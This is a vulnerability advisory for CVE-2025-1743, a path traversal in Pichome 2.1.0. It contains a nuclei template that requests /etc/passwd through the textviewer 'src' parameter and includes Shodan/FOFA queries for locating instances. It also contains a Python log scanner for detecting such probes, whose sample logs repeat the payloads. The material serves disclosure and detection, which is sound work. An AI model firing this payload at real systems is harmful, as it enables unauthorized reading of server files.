A vulnerability, which was classified as critical, was found in zyx0814 Pichome 2.1.0. This affects an unknown part of the file /index.php?mod=textviewer. The manipulation of the argument src leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
PoC code [publicly disclosed]
id: CVE-2025-1743

info:
  name: Pichome 2.1.0 - Arbitrary File Read
  author: 3th1c_yuk1
  severity: high
  description: |
    A vulnerability, which was classified as critical, was found in zyx0814 Pichome 2.1.0. This affects an unknown part of the file /index.php?mod=textviewer. The manipulation of the argument src leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
  reference:
    - https://github.com/sheratan4/cve/issues/4
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1743
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-22
    cve-id: CVE-2025-1743
    epss-score: 0.06501
    epss-percentile: 0.90741
    cpe: cpe:2.3:a:zyx0814:pichome:2.1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"PicHome"
    fofa-query: title="PicHome"
    vendor: zyx0814
    product: Pichome
  tags: cve,cve2025,lfi,pichome,zyx0814

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?mod=textviewer&src=file:///etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - ".scrollbar__wrap"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402200916b432e4fa36a5385a2fa784cecef26aa7fb52536faaf8d86a76bfb8cacde602207ad8915085ba6d980c93ea6fd582be8d4fb8c9ccdb9931fc82fa082831892fb3:922c64590222798bb761d5b6d8e72950
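As an added defensive example (not part of the advisory or of the nuclei template above), the following Python flags web-server access-log requests that match the exploitation pattern the template probes for: hits on /index.php with mod=textviewer whose src value carries a URL scheme such as file:// or a directory-traversal sequence. The log lines, IP addresses and the combined-log regex are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines in combined format (not taken from the page).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2025:12:00:01 +0000] "GET /index.php?mod=textviewer&src=file:///etc/passwd HTTP/1.1" 200 1834
203.0.113.5 - - [10/Mar/2025:12:00:02 +0000] "GET /index.php?mod=textviewer&src=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1834
198.51.100.7 - - [10/Mar/2025:12:00:03 +0000] "GET /index.php?mod=textviewer&src=notes/readme.txt HTTP/1.1" 200 512
198.51.100.7 - - [10/Mar/2025:12:00:04 +0000] "GET /index.php?mod=gallery HTTP/1.1" 200 9001
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def is_suspicious_src(src: str) -> bool:
    """True when a textviewer src value names a URL scheme or climbs directories.

    Decoding twice catches values that were percent-encoded more than once;
    parse_qs has already removed one layer for values taken from a query string.
    """
    decoded = unquote(unquote(src))
    # A scheme prefix (file:, php:, ...) means the viewer is being pointed outside
    # its own content tree; a Windows drive letter (C:) matches as well, which is
    # also not a legitimate relative path here.
    if re.match(r'^[a-zA-Z][a-zA-Z0-9+.\-]*:', decoded):
        return True
    # Any ".." path component, with either separator, is a traversal attempt.
    return ".." in decoded.replace("\\", "/").split("/")

def scan_log(text: str) -> list[dict]:
    """Return one record per request that looks like a CVE-2025-1743 probe."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/index.php":
            continue
        qs = parse_qs(parts.query)
        if qs.get("mod", [""])[0] != "textviewer":
            continue
        for src in qs.get("src", []):
            if is_suspicious_src(src):
                hits.append({"ip": m.group("ip"), "status": int(m.group("status")), "src": src})
    return hits
```

A 200 status on a flagged request is the stronger signal, since the template's own matchers treat a 200 body containing an /etc/passwd root entry as confirmation; a 4xx on the same request usually means a WAF or the patched version rejected it.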